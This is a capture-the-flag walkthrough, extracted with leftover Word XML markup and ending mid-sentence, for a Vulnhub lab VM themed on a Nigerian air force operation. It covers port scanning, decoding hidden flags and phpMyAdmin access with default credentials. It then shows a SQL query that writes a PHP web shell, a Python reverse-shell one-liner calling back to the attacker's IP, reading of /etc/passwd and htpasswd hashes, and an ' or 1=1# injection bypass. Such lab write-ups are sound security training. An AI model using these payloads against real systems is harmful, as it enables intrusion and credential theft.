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AF" w:rsidRPr="00D47EAF" w:rsidRDefault="00D47EAF" w:rsidP="00D47E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D47E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Defence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D47E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Space Solution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Flag | Mar 14, 2017 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In this post I’m going to show you how to solve the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Space VM provided by </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00D47E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SilexSecure</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00D47E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Team</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D47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You can find the VM on </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00D47E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link</w:t>
        </w:r>
      </w:hyperlink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The description in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Vulnhub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is not enough, is better if you read the official website for more information about the goal and flags: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http://ctf2017.silexsecure.com/flag.html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goal of the VM is to find all the 7 flags and to retrieve the audio and visual image and decipher it.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Attacker: 192.168.56.1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Victim: 192.168.56.20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Before starting, make sure that all the network interfaces are connected. Once imported the VM, </w:t>
      </w:r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tick</w:t>
      </w:r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the “Cable Connected” on both of the adapters.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run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this is what I get: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nmap_syn_version_full_192.168.56.20.nmap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Warning: 192.168.56.20 giving up on port because retransmission cap hit (2).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Increasing send delay for 192.168.56.20 from 0 to 5 due to 5667 out of 14167 dropped probes since last increase.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scan report for 192.168.56.20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Host is up (0.00025s latency).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Not shown: 65528 closed ports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PORT      STATE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SERVICE  VERSION</w:t>
      </w:r>
      <w:proofErr w:type="gram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21/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open     ftp    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ProFTPD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1.3.5a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80/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open     http     Apache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2.4.18 ((Ubuntu))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443/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 open   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/http Apache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2.4.18 ((Ubuntu))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2225/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open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OpenSSH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7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)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3242/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filtered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unknown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34617/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filtered unknown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50603/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filtered unknown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MAC Address: 08:00:27:F3:5F:52 (Oracle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virtual NIC)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Service Info: OSs: Unix, Linux; CPE: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cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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o:linux:linux_kernel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Read data files from: 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/bin/../share/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Service detection performed. Please report any incorrect results at https://nmap.org/submit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/ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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open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7EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://192.168.56.20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>, they have the same page. Within the source code of the page I find the following peace of code, which will contain the first flag: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Scripts --&gt;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="assets/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/jquery.min.js"&gt;&lt;/script&gt;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="assets/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/skel.min.js"&gt;&lt;/script&gt;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="assets/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/util.js"&gt;&lt;/script&gt;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  <w:t xml:space="preserve">&lt;script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="RmxhZyAwIChuZXRkaXNjb3Zlcik="&gt;&lt;/script&gt;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</w:r>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">&lt;script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="assets/lafiya.js"&gt;&lt;/script&gt;&lt;![Make sure you stick to intel gathering agent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]&lt;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!--&gt;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Decoded in base 64 it will return </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Flag 0 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netdiscover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As the page suggests, I should start some more Intelligence Gathering in order to hack the machine, so I visit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http://192.168.56.20/assets/lafiya.js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this is what I find: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/* HTML5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Nsikak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v2.6 Twitter: @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Silexsecure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Facebook: facebook.com/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silexsecure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/* 46 6c 61 67 20 32 20 39 61 38 37 38 30 32 38 31 64 33 65 33 37 63 35 39 37 63 65 65 37 63 61 35 38 62 66 64 34 33 35 0a*/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skel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=function(){"use strict";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t={breakpointIds:null,events:{},isInit:!1,obj:{attachments:{},breakpoints:{},head:null,states:{}},sd:"/",state:null,stateHandlers:{},stateId:"",vars:{},DOMReady:null,indexOf:null,isArray:null,iterate:null,matchesMedia:null,extend:function(e,n){t.iterate(n,function(i){t.isArray(n[i])?(t.isArray(e[i])||(e[i]=[]),t.extend(e[i],n[i])):"object"==typeof n[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]?("object"!=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e[i]&amp;&amp;(e[i]={}),t.extend(e[i],n[i])):e[i]=n[i]})},newStyle:function(t){var e=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("style");return e.type="text/css",e.innerHTML=t,e},_canUse:null,canUse:function(e){t._canUse||(t._canUse=document.createElement("div"));var n=t._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canUse.style,i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e.charAt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(0).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()+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e.slice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(1);return e in n||"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Moz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"+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in n||"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Webkit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"+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in n||"O"+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in n||"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"+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in n},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on:function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e,n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e.split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(/[\s]+/);return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t.iterate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i,function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(e){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a=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[e];if(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t.isInit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){if("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"==a)return void n();if("change"==a)n();else{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r=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a.charAt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(0);if("+"==r||"!"==r){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o=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a.substring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(1);if(o in t.obj.breakpoints)if("+"==r&amp;&amp;t.obj.breakpoints[o].active)n();else if("!"==r&amp;&amp;!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t.obj.breakpoints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[o].active)return void n()}}}t.events[a]||(t.events[a]=[]),t.events[a].push(n)}),t},trigger:function(e){return t.events[e]&amp;&amp;0!=t.events[e].length?(t.iterate(t.events[e],function(n){t.events[e][n]()}),t):void 0},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breakpoint:function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(e){return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t.obj.breakpoints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[e]},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breakpoints:function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(e){function n(t,e){this.name=this.id=t,this.media=e,this.active=!1,this.wasActive=!1}return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n.prototype.matches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=function(){return t.matchesMedia(this.media)},n.prototype.sync=function(){this.wasActive=this.active,this.active=this.matches()},t.iterate(e,function(i){t.obj.breakpoints[i]=new n(i,e[i])}),window.setTimeout(function(){t.poll()},0),t},addStateHandler:function(e,n){t.stateHandlers[e]=n},callStateHandler:function(e){var n=t.stateHandlers[e]();t.iterate(n,function(e){t.state.attachments.push(n[e])})},changeState:function(e){t.iterate(t.obj.breakpoints,function(e){t.obj.breakpoints[e].sync()}),t.vars.lastStateId=t.stateId,t.stateId=e,t.breakpointIds=t.stateId===t.sd?[]:t.stateId.substring(1).split(t.sd),t.obj.states[t.stateId]?t.state=t.obj.states[t.stateId]:(t.obj.states[t.stateId]={attachments:[]},t.state=t.obj.states[t.stateId],t.iterate(t.stateHandlers,t.callStateHandler)),t.detachAll(t.state.attachments),t.attachAll(t.state.attachments),t.vars.stateId=t.stateId,t.vars.state=t.state,t.trigger("change"),t.iterate(t.obj.breakpoints,function(e){t.obj.breakpoints[e].active?t.obj.breakpoints[e].wasActive||t.trigger("+"+e):t.obj.breakpoints[e].wasActive&amp;&amp;t.trigger("-</w:t>
      </w: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"+e)})},generateStateConfig:function(e,n){var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={};return t.extend(i,e),t.iterate(t.breakpointIds,function(e){t.extend(i,n[t.breakpointIds[e]])}),i},getStateId:function(){var e="";return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t.iterate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t.obj.breakpoints,function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(n){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i=t.obj.breakpoints[n];i.matches()&amp;&amp;(e+=t.sd+i.id)}),e},poll:function(){var e="";e=t.getStateId(),""===e&amp;&amp;(e=t.sd),e!==t.stateId&amp;&amp;t.changeState(e)},_attach:null,attach:function(e){var n=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t.obj.head,i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e.element;return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i.parentNode&amp;&amp;i.parentNode.tagName?!1:(t._attach||(t._attach=n.firstChild),n.insertBefore(i,t._attach.nextSibling),e.permanent&amp;&amp;(t._attach=i),!0)},attachAll:function(e){var n=[];t.iterate(e,function(t){n[e[t].priority]||(n[e[t].priority]=[]),n[e[t].priority].push(e[t])}),n.reverse(),t.iterate(n,function(e){t.iterate(n[e],function(i){t.attach(n[e][i])})})},detach:function(t){var e=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t.element;return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t.permanent||!e.parentNode||e.parentNode&amp;&amp;!e.parentNode.tagName?!1:(e.parentNode.removeChild(e),!0)},detachAll:function(e){var n={};t.iterate(e,function(t){n[e[t].id]=!0}),t.iterate(t.obj.attachments,function(e){e in n||t.detach(t.obj.attachments[e])})},attachment:function(e){return e in t.obj.attachments?t.obj.attachments[e]:null},newAttachment:function(e,n,i,a){return t.obj.attachments[e]={id:e,element:n,priority:i,permanent:a}},init:function(){t.initMethods(),t.initVars(),t.initEvents(),t.obj.head=document.getElementsByTagName("head")[0],t.isInit=!0,t.trigger("init")},initEvents:function(){t.on("resize",function(){t.poll()}),t.on("orientationChange",function(){t.poll()}),t.DOMReady(function(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/* Beheaded Air Force   */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*  There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is a big shoe to fill. Lord I need your feet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11/08/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2014  c.hedima@airforce.mil.ng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maps/kanuri/Borno/@11.8664433,10.9088387,7z/data=!3m1!4b1!4m5!3m4!1s0x111b0751329a9727:0xe4d749d5b2177a1d!8m2!3d11.5097479!4d12.9789121  Bama1987 */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{t.trigger("ready")}),window.onload&amp;&amp;t.on("load",window.onload),window.onload=function(){t.trigger("load")},window.onresize&amp;&amp;t.on("resize",window.onresize),window.onresize=function(){t.trigger("resize")},window.onorientationchange&amp;&amp;t.on("orientationChange",window.onorientationchange),window.onorientationchange=function(){t.trigger("orientationChange")}},initMethods:function(){document.addEventListener?!function(e,n){t.DOMReady=n()}("domready",function(){function t(t){for(r=1;t=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n.shift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();)t()}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e,n=[],i=document,a="DOMContentLoaded",r=/^loaded|^c/.test(i.readyState);return i.addEventListener(a,e=function(){i.removeEventListener(a,e),t()}),function(t){r?t():n.push(t)}}):!function(e,n){t.DOMReady=n()}("domready",function(t){function e(t){for(h=1;t=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i.shift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();)t()}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n,i=[],a=!1,r=document,o=r.documentElement,s=o.doScroll,c="DOMContentLoaded",d="addEventListener",u="onreadystatechange",l="readyState",f=s?/^loaded|^c/:/^loaded|c/,h=f.test(r[l]);return r[d]&amp;&amp;r[d](c,n=function(){r.removeEventListener(c,n,a),e()},a),s&amp;&amp;r.attachEvent(u,n=function(){/^c/.test(r[l])&amp;&amp;(r.detachEvent(u,n),e())}),t=s?function(e){self!=top?h?e():i.push(e):function(){try{o.doScroll("left")}catch(n){return setTimeout(function(){t(e)},50)}e()}()}:function(t){h?t():i.push(t)}}),Array.prototype.indexOf?t.indexOf=function(t,e){return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t.indexOf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(e)}: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t.indexOf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=function(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t,e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){if("string"==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t)return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t.indexOf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(e);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n,i,a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=e?e:0;if(!this)throw new TypeError;if(i=this.length,0===i||a&gt;=i)return-1;for(0&gt;a&amp;&amp;(a=i-Math.abs(a)),n=a;i&gt;n;n++)if(this[n]===t)return n;return-1},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Array.isArray?t.isArray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=function(t){return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Array.isArray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(t)}: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t.isArray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=function(t){return"[object Array]"===Object.prototype.toString.call(t)},Object.keys?t.iterate=function(t</w:t>
      </w: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,e){if(!t)return[];var n,i=Object.keys(t);for(n=0;i[n]&amp;&amp;e(i[n],t[i[n]])!==!1;n++);}:t.iterate=function(t,e){if(!t)return[];var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n;for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(n in t)if(Object.prototype.hasOwnProperty.call(t,n)&amp;&amp;e(n,t[n])===!1)break},window.matchMedia?t.matchesMedia=function(t){return""==t?!0:window.matchMedia(t).matches}:window.styleMedia||window.media?t.matchesMedia=function(t){if(""==t)return!0;var e=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window.styleMedia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||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window.media;return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e.matchMedium(t||"all")}:window.getComputedStyle?t.matchesMedia=function(t){if(""==t)return!0;var e=document.createElement("style"),n=document.getElementsByTagName("script")[0],i=null;e.type="text/css",e.id="matchmediajs-test",n.parentNode.insertBefore(e,n),i="getComputedStyle"in window&amp;&amp;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window.getComputedStyle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e,null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)||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e.currentStyle;var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a="@media "+t+"{ #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matchmediajs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-test { width: 1px; } }";return e.styleSheet?e.styleSheet.cssText=a:e.textContent=a,"1px"===i.width}:t.matchesMedia=function(t){if(""==t)return!0;var e,n,i,a,r={"min-width":null,"max-width":null},o=!1;for(i=t.split(/\s+and\s+/),e=0;e&lt;i.length;e++)n=i[e],"("==n.charAt(0)&amp;&amp;(n=n.substring(1,n.length-1),a=n.split(/:\s+/),2==a.length&amp;&amp;(r[a[0].replace(/^\s+|\s+$/g,"")]=parseInt(a[1]),o=!0));if(!o)return!1;var s=document.documentElement.clientWidth,c=document.documentElement.clientHeight;return null!==r["min-width"]&amp;&amp;s&lt;r["min-width"]||null!==r["max-width"]&amp;&amp;s&gt;r["max-width"]||null!==r["min-height"]&amp;&amp;c&lt;r["min-height"]||null!==r["max-height"]&amp;&amp;c&gt;r["max-height"]?!1:!0},navigator.userAgent.match(/MSIE ([0-9]+)/)&amp;&amp;RegExp.$1&lt;9&amp;&amp;(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t.newStyle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=function(t){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("span");return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e.innerHTML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=' &lt;style type="text/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"&gt;'+t+"&lt;/style&gt;",e})},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initVars:function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(){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e,n,i,a=navigator.userAgent;e="other",n=0,i=[["firefox",/Firefox\/([0-9\.]+)/]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"bb",/BlackBerry.+Version\/([0-9\.]+)/]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"bb",/BB[0-9]+.+Version\/([0-9\.]+)/]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"opera",/OPR\/([0-9\.]+)/]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"opera",/Opera\/([0-9\.]+)/]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"edge",/Edge\/([0-9\.]+)/]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"safari",/Version\/([0-9\.]+)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.+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Safari/],["chrome",/Chrome\/([0-9\.]+)/],["ie",/MSIE ([0-9]+)/],["ie",/Trident\/.+rv:([0-9]+)/]],t.iterate(i,function(t,i){return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a.match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[1])?(e=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[0],n=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(RegExp.$1),!1):void 0}),t.vars.browser=e,t.vars.browserVersion=n,e="other",n=0,i=[["ios",/([0-9_]+) like Mac OS X/,function(t){return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t.replace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("_",".").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"_","")}],["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",/CPU like Mac OS X/,function(t){return 0}],["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wp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",/Windows Phone ([0-9\.]+)/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,null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],["android",/Android ([0-9\.]+)/,null],["mac",/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Macintosh.+Mac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OS X ([0-9_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]+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)/,function(t){return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t.replace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("_",".").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"_","")}],["windows",/Windows NT ([0-9\.]+)/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,null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],["bb",/BlackBerry.+Version\/([0-9\.]+)/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,null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],["bb",/BB[0-9]+.+Version\/([0-9\.]+)/,null]],t.iterate(i,function(t,i){return a.match(i[1])?(e=i[0],n=parseFloat(i[2]?i[2](RegExp.$1):RegExp.$1),!1):void 0}),t.vars.os=e,t.vars.osVersion=n,t.vars.IEVersion="ie"==t.vars.browser?t.vars.browserVersion:99,t.vars.touch="wp"==t.vars.os?navigator.msMaxTouchPoints&gt;0:!!("ontouchstart"in window),t.vars.mobile="wp"==t.vars.os||"android"==t.vars.os||"ios"==t.vars.os||"bb"==t.vars.os}};return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t.init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(),t}();!function(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t,e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){"function"==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define&amp;&amp;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define.amd?define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([],e):"object"==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exports?module.exports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=e():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t.skel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=e()}(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this,function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(){return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skel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});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Do you see that comment with alphanumeric strings? </w:t>
      </w:r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hexadecimal, which converted will result in the second flag </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Flag2 9a8780281d3e37c597cee7ca58bfd435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lastRenderedPageBreak/>
        <w:t>Also, on the same URL I can see that we have some hints of naming convention for users on the system or of a service running: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c.hedima</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Time to fire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dirbuster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to see if we can find something else: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dirb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http://192.168.56.20 wordlists/big.txt | tee dirb_192.168.56.20_big.txt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[...]                                               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==&gt; DIRECTORY: http://192.168.56.20/phpmyadmin/                                                                                                                           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# $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dirb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http://192.168.56.20 wordlists/big.txt -X .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| tee dirb_192.168.56.20_big_php.txt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[...]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+ http://192.168.56.20/info.php (CODE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:200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|SIZE:90883)  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Looks like we have a system that is running PHP and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http://192.168.56.20/info.php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, also a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system is running on the server and is reachable from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http://192.168.56.20/phpmyadmin/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try to login in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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to the port 2225, and this is what I get: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c.hedima@192.168.56.20 -p 2225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###############################################################################################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WARNING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      DHQ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:NIG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DSS-NIG DIA-NIG - Authorized Access Only!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Disconnect IMMEDIATELY if you are not an authorized User in Operation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Lafia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Dole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 All actions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be Closely Monitored and Recorded by Cam7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Flag2B[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53c82eba31f6d416f331de9162ebe997]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################################################################################################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In here there’s another flag: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Flag2B[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53c82eba31f6d416f331de9162ebe997] (encrypt)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run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sslscan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to see if there’s any issue with the SSL, and this is what I find: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sslscan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192.168.56.20:443 | tee sslscan_192.168.56.20.txt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Version: 1.11.6-rbsec-5-g6891c0d-static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OpenSSL 1.0.2h-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dev  xx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XXX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xxxx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Testing SSL server 192.168.56.20 on port 443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TLS renegotiation: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Secure session renegotiation supported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TLS Compression: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Compression disabled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Heartbleed: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TLS 1.2 not vulnerable to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heartbleed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TLS 1.1 not vulnerable to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heartbleed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TLS 1.0 not vulnerable to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heartbleed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Supported Server Cipher(s):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Preferred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TLSv1.2  256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bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256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128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256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DHE-RSA-AES256-GCM-SHA384     DHE 2048 bits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128 bits  DHE-RSA-AES128-GCM-SHA256     DHE 2048 bits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ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256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ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256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DHE-RSA-AES256-SHA256         DHE 2048 bits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DHE-RSA-AES256-SHA            DHE 2048 bits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Preferred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TLSv1.1  256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bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256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TLSv1.1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DHE-RSA-AES256-SHA            DHE 2048 bits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Preferred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TLSv1.0  256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bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256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Accepted  TLSv1.0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256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits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SSL Certificate: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Signature Algorithm: sha256WithRSAEncryption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RSA Key Strength:    2048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Subject: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Flag3[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19c562a36aeb455d093b4f5236f]+[39 39 30]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Issuer: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Flag3[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19c562a36aeb455d093b4f5236f]+[39 39 30]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Not valid before: Jan 24 12:54:41 2017 GMT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Not valid after:  Jan 24 12:54:41 2018 GMT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So, I got another flag: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Flag3[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19c562a36aeb455d093b4f5236f]+[39 39 30]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Nothing more interesting for now on this path, so I come back to the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page on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http://192.168.56.20/assets/lafiya.js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I start investigating on this line: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*  There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is a big shoe to fill. Lord I need your feet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11/08/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2014  c.hedima@airforce.mil.ng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maps/kanuri/Borno/@11.8664433,10.9088387,7z/data=!3m1!4b1!4m5!3m4!1s0x111b0751329a9727:0xe4d749d5b2177a1d!8m2!3d11.5097479!4d12.9789121  Bama1987 */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On the August 2014 there was the terroristic attack by the Boko Haram Terrorists, as explained in the main page of the website. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c.hedima@airforce.mil.ng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must be the username that the user uses to get into the system, either </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ftp or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(don’t know yet), and the line </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>maps/kanuri/Borno/@11.8664433,10.9088387,7z/data=!3m1!4b1!4m5!3m4!1s0x111b0751329a9727:0xe4d749d5b2177a1d!8m2!3d11.5097479!4d12.9789121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points to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Borno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>, in Nigeria, on Google Maps. It might be a possible password, I keep it in my notes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wander around and I find another flag through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http://192.168.56.20/assets/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flage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7: 3aa652f41d8b4a23e17937149c784868 (widgets)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get into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I find out that the credentials are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:root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>. I get into the “admin” table of the “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silex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” database and I find another flag encoded in base64: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>flag 6 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Nigairforcecloud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}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>Since I’m in the database and the user has full privileges, I get into a SQL shell and got all the users with the following query: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load_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')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root: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x:0:0:root:/root:/bin/bash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daemon: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x:1:1:daemon:/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bin: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x:2:2:bin:/bin:/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sys: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x:3:3:sys:/dev:/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sync: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x:4:65534:sync:/bin:/bin/sync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games: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x:5:60:games:/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/games:/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man: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x:6:12:man:/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/cache/man:/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lp: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x:7:7:lp:/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/spool/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lpd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mail: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x:8:8:mail:/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/mail:/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news:x:9:9:news:/var/spool/news:/usr/sbin/nologin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uucp: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x:10:10:uucp:/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/spool/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uucp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proxy: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x:13:13:proxy:/bin:/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www-data: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x:33:33:www-data:/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/www:/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backup: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x:34:34:backup:/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/backups:/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list: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x:38:38:Mailing List Manager:/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/list:/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irc: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x:39:39:ircd:/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ircd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gnats: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x:41:41:Gnats Bug-Reporting System (admin):/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/lib/gnats:/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nobody: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x:65534:65534:nobody:/nonexistent:/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systemd-timesync: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x:100:102:systemd Time Synchronization,,,:/run/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systemd-network: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x:101:103:systemd Network Management,,,:/run/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netif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systemd-resolve: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x:102:104:systemd Resolver,,,:/run/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/resolve:/bin/false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systemd-bus-proxy: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x:103:105:systemd Bus Proxy,,,:/run/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syslog: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x:104:108::/home/syslog:/bin/false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_apt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:x:105:65534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::/nonexistent:/bin/false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messagebus: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x:106:109::/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dbus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silex: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x:1000:1000:silex,,,:/home/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silex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:/bin/bash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mysql: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x:107:114:MySQL Server,,,:/nonexistent:/bin/false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proftpd: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x:108:65534::/run/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proftpd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ftp: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x:109:65534::/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srv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/ftp:/bin/false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sshd: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x:110:65534::/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sshd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colabu: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x:1001:1001:Col Abu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Ali,Room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8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Mambila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Barrack,+23470896767,:/home/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colabu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:/bin/bash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landscape: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x:111:117::/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/lib/landscape:/bin/false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abuali:x:1002:1002:col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abu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ali,89,+234809978776,:/home/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abuali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:/bin/bash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>Since this works, I try the trick of adding a backdoor shell in PHP on the server with the following query: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SELECT "&lt;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passthru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($_GET['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']); ?&gt;" into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/www/html/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shell.php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';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I visit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http://192.168.56.20/shell.php?cmd=id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I get a response from the server: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33(www-data)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gid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=33(www-data) groups=33(www-data)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At this point I get a reverse shell on port 4444 on my local machine using python on the victim machine through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shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.1%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27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lnvp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4444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Listening on [0.0.0.0] (family 0, port 4444)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Connection from [192.168.56.20] port 4444 [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/*] accepted (family 2, sport 36114)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: 0: can't access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; job control turned off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33(www-data)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gid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=33(www-data) groups=33(www-data)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hostname</w:t>
      </w:r>
      <w:proofErr w:type="gram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server1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$ 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enp0s3: flags=4163&lt;UP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,BROADCAST,RUNNING,MULTICAST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&gt;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mtu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1500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192.168.56.20  netmask 255.255.255.0  broadcast 192.168.56.255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inet6 fe80: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:a00:27ff:fef3:5f52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prefixlen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64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scopeid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0x20&lt;link&gt;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ether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08:00:27:f3:5f:52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txqueuelen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1000  (Ethernet)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RX packets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2459498  bytes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453000467 (453.0 MB)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RX errors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0  dropped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  overruns 0  frame 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TX packets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2537289  bytes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1689425471 (1.6 GB)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TX errors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0  dropped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 overruns 0  carrier 0  collisions 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enp0s8: flags=4163&lt;UP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,BROADCAST,RUNNING,MULTICAST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&gt;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mtu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1500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10.0.3.15  netmask 255.255.255.0  broadcast 10.0.3.255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inet6 fe80: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:a00:27ff:fe79:28d0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prefixlen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64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scopeid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0x20&lt;link&gt;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ether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08:00:27:79:28:d0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txqueuelen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1000  (Ethernet)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RX packets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24  bytes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2931 (2.9 KB)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RX errors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0  dropped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  overruns 0  frame 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TX packets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32  bytes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2976 (2.9 KB)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TX errors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0  dropped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 overruns 0  carrier 0  collisions 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lo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: flags=73&lt;UP,LOOPBACK,RUNNING&gt;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mtu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65536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127.0.0.1  netmask 255.0.0.0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inet6 ::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1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prefixlen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128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scopeid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0x10&lt;host&gt;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 xml:space="preserve">loop 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txqueuelen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  (Local Loopback)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RX packets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243  bytes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24462 (24.4 KB)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RX errors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0  dropped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  overruns 0  frame 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TX packets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243  bytes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24462 (24.4 KB)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TX errors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0  dropped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 overruns 0  carrier 0  collisions 0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see that in the </w:t>
      </w:r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/www/html/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there’s a folder called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Nigairforcecloud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. I try to access through the browser, but it asks for a username and password in Basic HTTP authentication. So within the system I get the hashes of the passwords in the path </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47EA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/apache2/.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htpasswd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nigairforce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:$apr1$FRScwO7X$HglBpC2aGbzEMSXFuut6M/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>chedima@airforce.mil.ng:$apr1$CeDJSBoi$yD2xZPWHxJJGcGQP4kaY.1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c.hedima@airforce.mil.ng:$apr1$oHfZFD/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s$hy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/7q9.874UaUZeQbwoZH0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Guess what? The password for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chedima@airforce.mil.ng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7EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c.edima@airforce.mil.ng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Borno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>, as discovered previously.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>In here I get another flag: FLAGE 7: 3AA652F41D8B4A23E17937149C784868.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Based on what I see on the server from the reverse shell, I visit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http://192.168.56.20/Unit990/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I check the source code, and I find the following comment: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"Every intelligence Analysis system must be rooted in a strong understanding of  agent's access written for." -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ZmxhZyA0IHthZG1pbi5waHB9  --&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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decode in base 64 and I get </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>flag 4 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admin.php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}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check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http://192.168.56.20/Unit990/admin.php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I find out that is vulnerable to SQL Injection. The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SQLi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user is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' or 1=1#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. Once I’m in, in the source code I find the flag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5 {SQL injection}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, which decoded in base64 is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Flag 5 {SQL injection}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check also the file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client.php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>, which has the following source code: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&lt;div class="box-row box-new-member"&gt;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span&gt;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Code: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abuali@192.168.56.20&lt;/span&gt;&lt;/div&gt;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&lt;div class="box-row box-new-member"&gt;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span&gt;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Mission Instruction :&lt;/span&gt; Critical&lt;/div&gt;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&lt;div class="box-row box-new-member"&gt;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&lt;p&gt;&lt;span&gt;Access Code :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&lt;/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span&gt; ___&lt;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__H__&lt;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___ __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_[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(]_____ ___ ___  {1.0.12#stable}&lt;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|_ -| . [(]     | .'| . |&lt;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|___|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_  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']_|_|_|__,|  _|&lt;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|_|V          |_| &lt;span&gt; &lt;/span&gt;&lt;/p&gt;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&lt;p&gt;&lt;span&gt;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RGVmYXVsdEAxMg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==&lt;/span&gt;&lt;/p&gt;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decode the base64 string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RGVmYXVsdEAxMg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==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and I get </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Default@12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, which is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D47EA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password for the user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abuali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-p 2225 abuali@192.168.56.20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###############################################################################################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WARNING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      DHQ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:NIG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 DSS-NIG DIA-NIG - Authorized Access Only!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Disconnect IMMEDIATELY if you are not an authorized User in Operation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Lafia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Dole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 All actions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be Closely Monitored and Recorded by Cam7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Flag2B[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53c82eba31f6d416f331de9162ebe997]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>################################################################################################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abuali@192.168.56.20's password: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Welcome to Ubuntu 16.10 (GNU/Linux 4.8.0-39-generic i686)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Last login: Sat Feb 25 21:56:08 2017 from 192.168.56.20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abuali@server1:~$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Unfortunately the user is not a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudoer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I wander around and I find that the web application of the URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
